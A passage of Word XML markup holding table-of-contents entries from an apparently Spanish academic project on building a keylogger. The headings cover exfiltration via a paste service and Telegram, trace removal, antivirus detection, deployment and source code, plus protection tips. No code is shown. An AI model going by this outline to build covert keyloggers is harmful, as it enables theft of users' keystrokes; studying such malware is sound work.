          <w:instrText xml:space="preserve"> PAGEREF _Toc19810097 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>99</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E24312" w:rsidRDefault="00E24312">
      <w:pPr>
        <w:pStyle w:val="TDC3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1540"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc19810098" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>13.5.10.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Envío al servicio de Paste</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810098 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>99</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E24312" w:rsidRDefault="00E24312">
      <w:pPr>
        <w:pStyle w:val="TDC3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1540"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc19810099" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>13.5.11.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Canal de Telegram</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810099 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>100</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E24312" w:rsidRDefault="00E24312">
      <w:pPr>
        <w:pStyle w:val="TDC3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1540"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc19810100" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>13.5.12.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Eliminación de rastro</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810100 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>101</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1" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>13.6.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Depurado del funcionamiento</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810101 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>10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2" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>13.7.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Esquema del programa y grafico de llamadas</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810102 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>103</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3" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>13.8.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Generación del ejecutable</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810103 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>104</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4" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>13.9.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>¿Se detecta como malware?</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810104 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>105</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5" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>13.10.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Implantación</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810105 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>106</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6" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>13.11.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Problemas, soluciones y mejoras posibles</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810106 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>107</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07" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>13.12.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Código fuente</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810107 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>107</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108" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>14.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Resultado final</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810108 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>108</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109" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>15.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Coste del proyecto</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810109 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>109</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10" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>15.1.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Coste temporal</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810110 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>109</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11" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>15.2.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Coste económico</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810111 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>111</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112" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>16.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Conclusiones</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810112 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>11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13" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>16.1.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Tendencia</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810113 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>112</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14" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>16.2.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Constatación</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810114 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>113</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E24312" w:rsidRDefault="00E24312">
      <w:pPr>
        <w:pStyle w:val="TDC2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1100"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc19810115" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>16.3.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Consejos para protegerse contra keyloggers</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810115 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>114</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116" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>17.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Líneas de futuro</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
